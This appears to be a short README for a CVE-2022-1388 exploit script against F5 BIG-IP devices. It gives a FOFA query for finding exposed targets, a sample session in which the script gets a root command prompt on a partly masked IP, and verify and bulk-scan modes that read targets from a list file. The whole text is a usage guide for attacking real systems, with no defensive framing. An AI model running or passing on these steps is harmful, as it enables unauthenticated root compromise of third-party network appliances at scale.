F5 BIG-IP Unauthenticated RCE Vulnerability
F5 BIG-IP iControl REST身份验证绕过RCE漏洞
fofa keywords: title="BIG-IP®- Redirect"
- attack
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: whoami
root
[input your command]:
- verify:
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify
[+] https://203.xxx.xxx.xxx is vulnerable
$ python3 cve-2022-1388.py -f url.txt
[+] https://203.xxx.xxx.xxx is vulnerable